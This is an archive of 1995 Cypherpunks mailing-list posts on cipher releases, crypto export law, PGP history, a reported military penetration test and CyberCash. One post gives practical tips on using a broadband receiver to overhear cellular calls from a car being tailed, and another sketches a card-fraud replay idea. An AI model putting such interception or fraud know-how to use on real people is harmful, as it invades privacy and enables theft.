the ones that result in all of the individual substitution arrays being the
same.  This has a probability of about 2^-40 of happening, and is not the
basis of a practical attack, but it is interesting, anyway.  Thanks to
Colin Plumb for pointing this out. 

This weakness has been eliminated in the Diamond2 Encryption Algorithm.
See ftp://ftp.csn.net/mpj/public/diamond2.ps.gz for details.  If you are in
the USA or Canada, there is a reference implementation (as well as the above
document) in
ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/file/diamond2.zip,
where the ??????? is revealed in ftp://ftp.csn.net/mpj/README along with
an export warning.

*******

I've also put an updated description of another algorithm, the Sapphire II
Stream Cipher, in ftp://ftp.csn.net/mpj/public/sapphire.ps.gz and a reference
implementation in
ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/file/sapphire.zip

*******

DLOCK2.ZIP and SAPPHIRE.ZIP are also on the Colorado Catacombs BBS at
303-772-1062.

*******

You are invited to review the above algorithms and let me know if you find
any weakness in them.

*******

These are not commercial products, and this is not an advertisement.  This
is an electronic publication for the enjoyment of people who are interested
in cryptography for constructive purposes.

Merry Christmas!


                  ___________________________________________________________
                 |                                                           |
 |\  /| |        | Michael Paul Johnson  Colorado Catacombs BBS 303-772-1062 |
 | \/ |o|        | PO Box 1151, Longmont CO 80502-1151 USA   Jesus is alive! |
 |    | | /  _   | mpj@csn.org aka mpj@netcom.com m.p.johnson@ieee.org       |
 |    |||/  /_\  | ftp://ftp.csn.net/mpj/README.MPJ          CIS: 71331,2332 |
 |    |||\  (    | ftp://ftp.netcom.com/pub/mp/mpj/README  -. --- ----- .... |
 |    ||| \ \_/  | PGPprint=F2 5E A1 C1 A6 CF EF 71  12 1F 91 92 6A ED AE A9 |
                 |___________________________________________________________|

-----BEGIN PGP SIGNATURE-----
Version: 2.7.1

iQCVAwUBMNpaMfX0zg8FAL9FAQENjgQAoXP16Db9FdBuzRp1VXug3JWh7yCcHQCJ
X/t79/q512WGYWBIKznkczgfYNE7V94J2dhEP6EfKeZzVN2J5AHV4zqq7e9IWR49
FQakcZCyIrSJIJCpRk/cyMOX5zc1posAkAAhEka7nOd9n/GgW9mHPr57yFwNQgB4
e2wcSW1r9Oo=
=v8d3
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 23 Dec 1995 04:29:48 +0800
To: cypherpunks@toad.com
Subject: Re: Attacking Clipper with timing info?
Message-ID: <2.2b7.32.19951222174145.008d7eb0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:49 AM 12/22/95 -0600, you wrote:

>Of course, if we did not pax taxes there would be no need to wonder if  
>we're getting our money's worth.  A self-funded,for-profit NSA?  Now  
>there's a liberatarian idea if I ever heard one.

A similar concept has already been explored.  Check out
http://www.digicrime.com/

I am sure that a "for profit NSA" would be very similar in content and
substance to the company at that URL.

|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |  alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Weld Pond" <weld@l0pht.com>
Date: Sun, 24 Dec 1995 05:30:55 +0800
To: cypherpunks@toad.com
Subject: Re: 900mhz digital phones
Message-ID: <199512232055.PAA01594@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain


floyddb@alpha.c2.org:
>         There is a company called Optoelectronics that markets a
>         radio reciever 
>          called the Interceptor.  This is a broad band (several
>          hundred MHz) device designed to lock on to the most
>          powerful signal around, regardless of frequency.  As
>          supplied, it only has a rubber duck antenna, but a
>          broadband, directional antenna (Log Periodic?) could be
>          attached.  There are AM and FM versions that output audio
>          and a version called the Scout that controls a scanner. 
>          These could have outboard devices hung on to them to decode
>          digital signals, record the conversation ... all for less
>          than $1000

I don't think that the  Interceptor is going to be much use with 
spread spectrum reception.  Unless you are really, really close to your 
target other non-ss signals are going to be much stronger.  

The freq range of the device is 30MHz-2GHz.  It is also legal to sell 
even though it is great at picking up the cellular phone 
conversations in the car you are tailing. There is also the plausible 
deniability in a device like this because you don't know what 
frequency you are listening to so you don't know if it is one of 
those "illegal ones".

A directional antenna isn't much use with a device like this because
it will pick up many other stronger signals that will overwhelm your
target transmission.  I am speaking of suburban or urban areas here.
This may work if you are in a rural region where there are no cell
towers, braodcast towers, or repeaters in use.

The Scout is a just frequency counter so you must have a scanner or
the Interceptor  to actually listen in. 

- Weld Pond - 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 23 Dec 1995 04:02:47 +0800
To: Jeff Gehlbach <jeffg@HiWAAY.net>
Subject: Re: Remote use=export?
In-Reply-To: <9512220547.AA27294@fly.HiWAAY.net>
Message-ID: <Pine.SOL.3.91.951222105847.4074A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 21 Dec 1995, Jeff Gehlbach wrote:

> 
> Is granting use of crypto software running in the US to a remote user
> outside the US considered exportation?  For example, if allow my friend in

Not export, but disclosure, and hence a violation. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Sat, 23 Dec 1995 04:27:30 +0800
To: cypherpunks@toad.com
Subject: GAK shutdown?
Message-ID: <Pine.SUN.3.91.951222115252.19993A-100000@hertz.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



Last night I realized that NIST has been shutdown since the 
weekend...congratulations to congress for a temporary halt to GAK!

-Thomas






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@cris.com>
Date: Sat, 23 Dec 1995 04:11:00 +0800
To: cypherpunks@toad.com
Subject: Re: Navy hacked by Air Force?
In-Reply-To: <9512221718.AA15130@all.net>
Message-ID: <55oht13r97.fsf@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


fc@all.net (Fred Cohen) said:

FC> Credible? No.  Accurate? Yes.  We all make mistakes, and whenever I
FC> find one that I've made, I try to admit it and fix it ASAP.  What's
FC> not credible is people who don't correct mistakes when they find
FC> them.

	Well, you corrected it, but you didn't admit it, at least not
here, and it makes people who made comments on the _original_ version
look like fools.  Next time when you quote a corrected article, please
note that it's been corrected.  The difference between an AF captain (4
years of service) and a Navy captain (17-ish years of service) is
substantial when when judging whether they could be considered
'whizzkids' in this environment.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3
Junk email is NOT appreciated.  If I want to buy something, I'll find
you.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jps@monad.semcor.com (Jack P. Starrantino)
Date: Sat, 23 Dec 1995 04:08:10 +0800
To: cypherpunks@toad.com
Subject: Re: Air Force hacks Navy? Eeeek!
In-Reply-To: <Pine.HPP.3.91.951221235554.6915A-100000@roboben.engr.ucdavis.edu>
Message-ID: <9512221714.AA13065@monad.semcor.com>
MIME-Version: 1.0
Content-Type: text/plain


The following article is from Defense News Oct. 9-15, 1995 pp1,37.

Hacker Exposes U.S. Vulnerability
By Pat Cooper and Frank Oliveri
Defense News Staff Writers

Washington -- A U.S. Air Force captain, using a personal computer and a
modem, penetrated the command and control systems of U.S. Navy ships
operating in the Atlantic Ocean, exhibiting the awesome offensive
capability of information warfare and the significant danger U.S. forces
are just beginning to learn how to counter.

Air Force personnel based at Hanscom Air Force Base, Mass., with the
knowledge and permission of the Navy, penetrated the computer systems of
naval ships in the Atlantic Ocean, Air Force Lt. Gen. John Fairfield,
deputy chief of staff for command, control, communications and
computers, said Sept. 25.

Using standard computers, Air Force operators tapped into the Internet,
via a telephone link to the information superhighway, and connected with
a ship through an electronic mail link in one of the ships' networked
computers, Air Force Officials said Sept. 28.

Once inside the ship's computer network, Air Force Operators navigated
to the ships command and control system and could have given the ship
bogus steering commands, Fairfield said.

The methods of the break-in and the actual vulnerabilities it exposed
are classified.

<lots more text>

jps
-- 
Jack P. Starrantino     (215) 674-0200 (voice)
SEMCOR, Inc.            (215) 443-0474 (fax)
65 West Street Road     jps@semcor.com
Suite C-100
Warminster, PA 18974




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Sat, 23 Dec 1995 04:02:35 +0800
To: junger@pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Subject: Re: Remote use=export?
In-Reply-To: <m0tT7SA-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <95Dec22.121656edt.1000@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Jeff Gehlbach writes:
> 
> : -----BEGIN PGP SIGNED MESSAGE-----
> : 
> : I apologize if this is a dead horse, but...
> : 
> : Is granting use of crypto software running in the US to a remote user
> : outside the US considered exportation?  For example, if allow my friend in
> : Paris to use a PGP binary residing and running on my PC in Washington, is
> : either of us violating any ITAR or similar restrictions?
> 
> Nothing about the ITAR is unambiguous, but since what is forbidden is
> ``exporting'', which includes ``disclosing to foreign persons'', and
> since use is not forbidden, it is hard to see how what you suggest
> could violate the ITAR.  (And I don't know of any other U.S. law or
> regulation that it could violate.)

If memory serves, Digital Equipment Corp was obliged to remove a
demonstration supercomputer from the net.  The argument was that
Iraqis could telnet into it (it had free guest accounts) and run
nuclear weapons simulations on it.  Some of the list members
probably remember the details.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Sat, 23 Dec 1995 04:25:53 +0800
To: dreschs@austnsc.tandem.com
Subject: Re: Navy hacked by Air Force?
In-Reply-To: <55vin93uyk.fsf@galil.austnsc.tandem.com>
Message-ID: <9512221718.AA15130@all.net>
MIME-Version: 1.0
Content-Type: text


> On Cypherpunks, fc@all.net (Dr. Frederick B. Cohen) said:
> 
...
> 	Strange, Dr Fred, this isn't the 'actual text' I saw quoted in
> RISKS Digest - did you 'fix' it so that it was a bit more credible?
> 
> Dr Fred's paragraph:
> 
> FBC> 100% wrong - he was an insider, he had a great deal of assitance,
> FBC> he had cryptographic devices and keys, and he had special insider
> FBC> knowledge.  If he was an Air Force captain, he could not have been
> FBC> all that young.  Whizzkids are usually considered teenagers.
> FBC> Anyone know of any teenaged AF captains these days?
> 
> RISKS Digest's paragraph:
> 
> RISKS> 100% wrong - he was an insider, he had a great deal of
> RISKS> assistance, he had cryptographic devices and keys, and he had
> RISKS> special insider knowledge.  If he was a Navy captain, he could
> RISKS> not have been all that young.  Whizzkids are usually considered
> RISKS> teenagers.  Anyone know of any teenaged Navy captains?

Credible? No.  Accurate? Yes.  We all make mistakes, and whenever I find
one that I've made, I try to admit it and fix it ASAP.  What's not
credible is people who don't correct mistakes when they find them. 

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 23 Dec 1995 05:06:34 +0800
To: cypherpunks@toad.com
Subject: Re: taking electronic privacy into our own hands
Message-ID: <199512222026.MAA21559@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Dec 1995, Eric Anderson wrote:

> 	Would it be possible to write a program ( i.e. a worm or
> Trojan) to ferret out personal information that is stored in databases
> and encrypt it?
>
> I was just wondering what such an undertaking would entail.

Actually, there is no need to write any such code.

AT&T distributes just such a beast to any and all comers.  It can take
personal information and send it out over a secure socket layer.

I think a couple of partners in crime, Cheswick and Bellovin of AT&T
research had a hand in its continuing distribution.

> Eric


Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 23 Dec 1995 06:40:25 +0800
To: cypherpunks@toad.com
Subject: Re: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE??
Message-ID: <199512222111.NAA24171@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Just in case, anyone missed this yesterday, I thought I'd
renominate AT&T & Netscape for the:

          *** 1995 CHRISTMAS NET SCROOGE ***

                    *** AWARD ***

    (T-shirt sales coming soon, to a website near you ...)

                     ------------

Alice here ...

Back on Tue, 19 Dec 1995, I wrote:

>>>Can anyone tell me whether Ian Goldberg and David Wagner got their
>>>$25,000 from Netscape for finding the HUGE security flaws in Netscape's
>>>existing product line??
>>>
>> >I can't remember whether they got anything or not ...
>> 
>> That would be no (well, except for the nifty T-shirt from Sameer; Thanks!).
> 
> Not anything??  That's shameful ... where on earth are the values in 
> America, today?  

Everyone should ask this question.  AT&T can sign-on to a two-page ad,
calling on Congress to balance the budget -- to cut off veterans, and
cut-off women with dependent children just before Christmas.  It can
sign on to this, but it can't bother to even offer a scholarship to
the students who helped make its fortunes.  It would rather leave the
impression that it freeloads off of other's efforts.

It's shameful.

> AT&T and Netscape have jointly made a small fortune distributing this
> product, and yet NEITHER company feels that the software engineers who
> "voluntarily" made a difference -- a couple of students -- deserve
> even a wooden nickel for the ideas which were used.
> 
> It's absolutely shameful.  But then, I guess that AT&T and Netscape
> have no shame at all.
> 
> They just steal "intellectual property" from students, and don't even
> pay a token amount.
> 
> And people wonder what's wrong with America?

Luckily for those of us who don't live in the United States, we can
perhaps look at that country and truly wonder what is going on over
there, and what is wrong with America?

Where are the values amongst ALL Americans, not just Netscape and
AT&T?  What are the role models that all the leaders -- business,
sports, and political leaders -- show to the national youth.

Here is all I've seen (as a foreigner), over the last while:

Enid Greene Waldholtz blubbering in a news conference about how she as
a congress person certainly COULDN'T be expected to resign after
winning her election with stolen money.  Blubbering for five hours
straight (except when she had to stop to turn a page, I mean) ... She
certainly said that "leadership" is all about playing "victim".  Poor
little Enid. (And even worse, she was _defended_ by Susan Molinari.)

Bob Dole, deciding to go to Bosnia.  The former WW II veteran
willingly jeopardizing the lives of American boys -- boys who have put
their lives on the line in a _volunteer_ armed force -- all for a
lousy political photo-op.  The chance to say ... "hey look at me, I'm
here in Bosnia."  Someone who's willing to overrule the Pentagon's own
most diplomatic advice on how complex an operation this actually is.

And then there is AT&T.  A company who's Chairman can publish a letter
which calls on Congress to cut off checks to mothers with dependent
children and war veterans days before Christmas, all while stealing
and freeloading off of the work of some students.

Scrooge ... take heart.

Here's Holiday wish #1.  Enid do the right thing ... resign.  Say the
"right thing" and say that your child -- the future and the delayed
gratification that the future brings -- is much more important than
your own personal PRESENT political aspirations.

Here's Holiday wish #2.  Bob, lots of people worked their asses off to
make sure that the American fighter pilot, and the two French fighter
pilots could be rescued from Bosnia.  If you want to go and get some
photo-ops, go to Germany or Italy, and give one hell of a vote of
support to the boys that are there -- a support which could just as
easily have been given and should be given in Congress.  A _real_
strong unfettered commitment.

And here's Holiday wish #3.  AT&T.  Do the right thing.  Reward those
people who help make you a fortune.  Stand tall as an example, rather
than as an embarrassment to the nation.  You've ignored this for so
long now, that you've almost dug your own grave.  But you still have a
chance to save face.  Have the courage to take the chance when it's
offered.  Simply say that the proposal to reward David Wagner and Ian
Goldberg -- some holiday mad money and scholarships -- was lost in
committee, and approval processes -- but it WAS in the works, and it
was recommended and can now be announced just before Christmas, as a
rightful reward.

Some holiday cheer.

Will people think it's a cynical attempt at manipulation?  Yep.  But
it's a darned site better than the alternatives -- especially when you
look at possible future outcomes.  Trust me, this is far better than
calling for veterans and single mothers with children to be cut-off
just before the holidays.

Perhaps, Enid, Bob, and AT&T will all learn when to use offense and
when to use defense.  They might also learn that the best offense is a
good defense.  They might even begin to look at what "courage" truly
is, and of how difficult it can be for anyone to do the "right thing",
especially when they think that they're surrounded by minefields.  

Even when the "right thing" is in your own best interest, you not only
have to be shown the right path to take, but you have to have the
motivation and courage to make the move and take action.

Enid, Bob, and AT&T, take note.

Hopefully for the holidays, everyone finds the courage to neutralize
some portion of the vulnerability spectrum they've placed themselves
in.

> >   - Ian "There's a reason people talk about `starving grad students'..."
> > 


Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@atlas.ex.ac.uk
Date: Fri, 22 Dec 1995 22:33:49 +0800
To: cypherpunks@toad.com
Subject: PGP timeline FAQ... comments requested
Message-ID: <297.9512221337@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



There seems to be much confusion amongst some of the newer users of
PGP who frequent alt.security.pgp, and recently whilst delving in to
give my version of how it happened my post got longer and longer,
until it grew on the spur of the moment into a sort of FAQ.  I got a
few comments, and corrections from that post, but I thought there are
likely to be people who know more annecdotes and were around at the
time that RSA was being published in the face of NSA opposition, etc.

Let me have your comments on the accuracy, plus any annecdotes which
you think really should go in to give the correct feel for the
historical timeline.

Thanks,

Adam

======================================================================
PGP timeline and brief history
======================================================================

contents:

0    Definitions of acronyms

1    History of crypto as it applies to PGP

2    Birth of PGP

3    USG decides they don't like PRZ

4    PRZ, MIT and RSA sort out earlier patent issues

5    Current legal status

6    ITARs viewed from inside the US

7    ITARs viewed from outside the US

======================================================================
0    definitions of acronyms
======================================================================

PGP = Pretty Good Privacy

PRZ = Phil R Zimmermann, internet folk hero, author of PGP

RSA = The RSA public key algorithm as used in PGP

RSADSI = rsa.com, RSA Data Security Inc, patent holders of some public
         key stuff, which they claim means that no one can use RSA without
         getting a license from them.

PKP = public key partners RSADSI plus Cylink (plus others?) (now disbanded)

ITAR = International Traffic in Arms Regulations controls export of
       controlled munitions from the US, things like military
       aircraft components, biological and chemical weapons, and also
       (very strangely) cryptographic software.

PK = public key (crypto)

NSA = US National Security Agency, US govt's largest spook agency.
      whimsically known as No Such Agency, because until recently the US
      govt tried to deny they even existed.

OTDC = Office of Defense Trade Controls, USG group charged with
       enforcing ITAR.  They consult with the NSA, the NSA has the
       last word on what gets export approval.

======================================================================
1    History of crypto as it applies to PGP
======================================================================

1.1  The year is 1976 a cryptographer, and privacy advocate named
     Whitfield Diffie, together with mathematician named Martin Hellman
     discovers public key cryptography.  (DH key exchange is still a
     commonly used key exchange protocol -- DH = Diffie-Hellman).

1.2  1977 Ron Rivest, Adi Shamir, and Len Adleman discover another more
     general public key system called RSA (after surnames Rivest,
     Shamir, and Adleman).  R, S & A were researchers at MIT
     (significant later, because MIT had part ownership of patents.)

1.3  NSA tells MIT and R, S & A that they'd better not publish this or else.

1.4  Amusingly Adi Shamir (A from RSA) isn't even a US citizen, he's an
     Israeli national, and is now back in Israel at the Technicon (is
     he, anyone know his current affiliation?)  Who knows what the NSA
     would have done about him if they had succeeded in supressing RSA
     - not allowed him out of the US?

1.5  MIT and R, S & A ignore NSA and publish anyway in SciAm July
     1977. Comms ACM (feb 1978, vol 21, no 2, pp 120-126 in case 
     you want to see if it's in your library - it's in Exeter Univ
     (UK) library).

1.6  Because the publication was a rush job due to the NSA, R,S & A
     and the later formed PKP and RSADSI lose patent rights
     to RSA crypto outside the US.  This is because most places
     outside the US, you have to obtain a patent *before*
     publication, where as in the US, you have one year from the
     publication date to file for patents.  This also had implications for
     PGP later

1.7  IDEA was developed by Xuejia Lai and James Massey at ETH in Zurich.
     (Relevant to PGP because IDEA is the symmetric key cipher used
     together with RSA in PGP).  Also crypto politics relevance in
     that it is another (of many) examples of the fact that crypto
     knowledge and expertise is worldwide, ie why export restrict
     something which is available both sides of the ITAR fence, or
     even originated *outside* it?  (Strangely, ITAR applies to
     importing and then re-exporting a crypto system, even if no
     modifications are made).  There are lots of other symmetric key
     ciphers, IDEA is one with a good reputation (no known practical
     attacks better than brute-force to date, and a good key size), and
     is just referenced here because of its use in PGP.

(some years pass...)

======================================================================
2    Birth of PGP
======================================================================

2.1  PRZ wrote PGP

2.2  PRZ gave PGP to some friends

2.3  some friends up loaded onto a few bulletin boards (US only)
     One friend (allegedly Kelly Goen) went around pay-phones with a
     portable, an acoustic coupler, and a list of BBS phone numbers
     uploading and then driving on to another area.  This cloak and
     dagger stuff was because at the time the USG had some draconian
     sounding proposed law on the books which sounded like it was
     going to outlaw crypto.  The intention was to ensure that PGP was
     available before this law came into effect, and to avoid being
     stopped if the USG took interest.

2.4  somehow PGP leaked outside the US via the internet.  Information
     wants to be free, as someone said: `trying to control the free
     flow of information on the internet is like trying to plug a
     sieve with a hole in it'.  Also Tim May's quote 'National borders are
     just speedbumps on the information superhighway' expresses the
     point very nicely.

2.5  people all over the world (yeah outside the US too) start using PGP

2.6  RSA complains to PRZ that PGP violates their PK patents

2.7  PRZ tells RSA to get stuffed, says its the users problem to get a license

2.8  PGP is considered potentially patent infringing because of 2.6

2.9  Illegality taint increases the spread of PGP, generates news, more
     people get a copy to see what the fuss is about

(some time passes, PGP gets real popular...)

======================================================================
3    USG decides they don't like PRZ
======================================================================

3.1  US govt decides that they don't like PRZ because the NSA can't
     tap all those internet mail messages anymore.  (the NSA part is
     speculation, but in my opinion likely true).

3.2  US govt begins investigating PRZ for alleged aiding with ITAR
     violation.

3.3  Phil Zimmermann legal defense fund set up to cover his legal
     expenses

3.4  still on going...

(concurrently...)

======================================================================
4    PRZ, MIT and RSA sort out earlier patent issues
======================================================================

4.1  MIT and PRZ work with RSA to sort out patent issue.

4.2  A solution is obtained in that RSA agree that PGP can use RSA
     provided that their RSAREF library is used.

4.3  PGP2.5 is written which uses RSAREF in place of MPILIB (also
     has backwards compatibility with older versions impaired to discourage 
     use of older allegedly patent infringing versions - to keep RSA happy)

4.4  RSAREF may be slower, but at least with some negotiating by PRZ
     and MIT, PGP is now 100% legal in the US

4.5  MIT begins acting as official US distributor of PGP

4.6  As usual, a few milli-seconds (well okay, minutes) after the
     official release of a new version of PGP, it gets exported from
     the US.

4.7  The deal with RSA over RSAREF has fixed the patent related
     problems in the US, but it has created a copyright related
     problem outside the US, (recall 0.6).  RSAREF is a software
     package copyrighted by RSA, and RSA is not allowed to export it
     because of ITAR, and their license agreement says as much (ie it
     says that you must not export it, and if you do export, you, and
     the subsequent users of it, are in breach of license).  It is
     therefore supposed that RSA could if they wanted complain about
     this (who knows that they would want to, or what conceivable
     benefit it would give them if they did).  This isn't enough to
     bother most people, but commercial users, and big organisations
     have lawyers, and are wary of such things.

4.8  Staale Schaumaker put together pgp26i to avoid this problem.  Main
     difference between pgp26x and pgp26xi is that pgp26xi uses PRZs
     original big integer library MPILIB, which is any case faster than
     RSADSI's RSAREF, and the lack of the legal kludge noted in 3.3.

======================================================================
5    Current legal status
======================================================================

5.1  PGP is legal both inside and outside the US.  You just need to use
     pgp26 versions inside the US, and pgp26xi versions outside the US.

5.2  In the US if you are using PGP in a commercial setting, and care
     about patents, you should purchase a copy of ViaCrypt pgp2.7

5.3 Commercial use outside the US: RSA is free, in the PGP docs (pgp262i
    & pgp262) Ascom-Tech are quoted as saying that currently no license 
    is required for commercial use of PGP outside the US as far as they
    are concerned.  Ascom-Tech are the patent holders of IDEA (see
    1.7), the symmetric crypto system used by PGP.

======================================================================
6    ITARs viewed from inside the US
======================================================================

6.1  ITAR means that if you are in the US you should not export PGP.
     (Yeah it's already available on a few thousand ftp sites around the
     free world, so another export isn't going to make any difference, but
     the NSA and the ODTC might not see it in that light).

6.2  Even though controlling the export of freeware software available
     worldwide might seem incredibly stupid (not to mention
     pointless), you should bear in mind that the penalties for
     getting successfully prosecuted for violating ITAR are rather
     steep.  Up to $1,000,000 (US$) fine, and and up to10 years
     imprisonment per count of export.

6.3  They'd probably never do anything to you, PRZ is just a scape goat
     (someone they can symbolically persecute to discourage others).
     I have personally seen several people from US sites post crypto
     source and binaries (nautilus, PGP itself even).  Plus of course
     this:

#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length$n&~1)/2)

     has probably been exported a few hundred thousand times by now.
     (It's an implementation of RSA encrypt and decrypt in perl and dc
     - a real crypto system, which has every right to claim ITAR
     status if anyting does, and yet benefits from being more
     convienient to use as a .sig than a uuencoded PGP binary)

======================================================================
7    ITARs viewed from outside the US
======================================================================

7.3  If you are outside the US, ITAR probably doesn't apply to you. 
     You could, if you could be bothered, down load PGP from a
     US site, and short of attempting an extradition for violating a
     regulation which only applies in the US, there would be nothing
     the NSA, or USG could do about it.  Most extradition treaties tend
     to rely on the action being prosecuted being illegal in both
     countries.

7.4  Yeah, I know `tell that to Manuel Noriega' (a Panama citizen who
     was kidnapped by a USG undercover agents and brought to the US to
     face trial for importing/exporting drugs from Panama into the US.
     He broke no Panamanian laws, he is a citizen of Panama, and was in
     Panama when he committed his crime, and he is now languishing in
     a US jail).

     However, he was kidnapped for a number of reasons:

	1. the USG thought they could get away with it (Panama owed
           them a few favours)

        2. politically easy to pass of acts of aggression (kidnap by
           civilised countries in this day and age?) in the name of
           the `War on Drugs'

        3. they thought it was worth it.

     Some of these criteria are likely to be missing if there was an
     attempt to extradite a non-US citizen outside the US for breaking
     ITAR.  One big problem is that crypto is not controlled as much
     in most of the free world.  Also the fact that the USG haven't
     bothered other people within the US who have similarly exported
     crypto software (examples cited in 6.3) would make the whole
     situation look rather silly.

7.5  A more important consideration is that although a non-US
     downloader of PGP from a US site would be effectively immune to
     the ITAR nonsense, the owner of the (US based) ftp/www site may
     not be.  You might get the site owner in trouble for not taking
     adequate precautions.  So politeness demands that you don't do
     it.  

7.6  Indeed why bother anyway, because PGP is available from
     literally thousands of ftp sites, there is bound to be a closer
     (and hence likely faster download) copy, without any hoops to
     jump though.

======================================================================

Long live the Pretty Good revolution,

Adam Back <aba@dcs.ex.ac.uk>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Klur" <dklur@dttus.com>
Date: Sat, 23 Dec 1995 04:32:35 +0800
To: WWW-BUYINFO@ALLEGRA.ATT.COM
Subject: Cybercash questions...
Message-ID: <9511228196.AA819668788@cc1.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     
     Hello,
     
     Just a few questions about Cybercash...
     
     - How is the consumer's credit card # stored on his hard drive?  
     Encrypted with the bank's public key? Or does the consumer have a 
     private key?
     
     
     - How does the merchant know where to ship the goods?  Is the merchant 
     required to ship the goods to the billing address on the cardholder's 
     credit card account?  If so, does the bank provide the merchant with 
     this info?  How is it encrypted?  Or does the customer indicate to the 
     merchant where to ship the goods?  Also, what infor does the merhcant 
     send to Cybercash, and how is it encrypted?
     
     The fraud possibility I see is that Bob could steal Alice's encrypted 
     credit card number (by sniffing when she buys something at Charlie's 
     Internet shop).  Then, without decrypting it, he could use it (still 
     encrypted) at Don's Internet shop, and ask Don to ship the goods to 
     Bob's address.  Since Don will not decrypt Alice's card number he will 
     not know that it is not Bob's card.  Cybercash will validate Alice's 
     card, but will not know that it is really Bob who is the customer.  
     Don will ship the goods to Bob, and Alice will get a fraudulent charge 
     on her bill.
     
     Am I missing something?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Sat, 23 Dec 1995 03:58:39 +0800
To: dreschs@austnsc.tandem.com
Subject: Re: Air Force hacks Navy? Eeeek!
In-Reply-To: <55wx7p3vfz.fsf@galil.austnsc.tandem.com>
Message-ID: <9512221857.AA17752@all.net>
MIME-Version: 1.0
Content-Type: text


> 	I saw the IW article that Light Ray saw in the RISKS Digest,
> and, while it raises some valid questions, it in turn has some internal
> problems.  For example, the IW author apparently doesn't understand the
> difference between a Navy captain (O-6) and an Air Force captain (O-3),
> dismissing the whole story because a Navy captain would be far to old to
> be a 'whizzkid'.

Am I reading a different article? What I read was that the IW person
talked to several inside sources and found out and reported facts.  S/He
made a mistake in saying Navy instead of AF somewhere in his posting to
Risks and fixed it before sending it to the IW list (which is where I
got it).  From what I read, s/he found out the truth from people who
knew the truth and tried to get the word out.

> I would have been able to make captain at 24).  While the ET article
> looks like it was written by someone who didn't understand the fine
> details of what happened, the IW article looks like it was written as
> military smokescreen.

I thought the ET article indicated an exaguration, but if it's true that
there are no Battleships in the US Navy anymore and that the attack was
run using DoD crypto equipment and networks, it's a heck of a lot
different than buying an off-the-shelf Internet package and taking down
the fleet.

I have no doubt that someone with enough expertise, classified knowledge
and equipment, access, and assistance can get some limited control over
some US Navy ships for some period of time - but I seriously doubt that
a computer whizzkid can take over the fleet from a PC via Email.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 23 Dec 1995 07:16:17 +0800
To: John Pettitt <jpp@software.net>
Subject: Re: ex encrypted script
Message-ID: <m0tTFol-00090DC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:57 PM 12/21/95 -0800, you wrote:

>
>There is encrypt and then there is render useless to the reader.
>
>A tale I hear is that when HP had to deliver operating system source to
>the french government they stripped all comments and changed all variable
>and subroutine names to 32 byte strings of I 1 0 (zero) and O (uppercase O).
>It still compiled but was 100% useless to human readers.
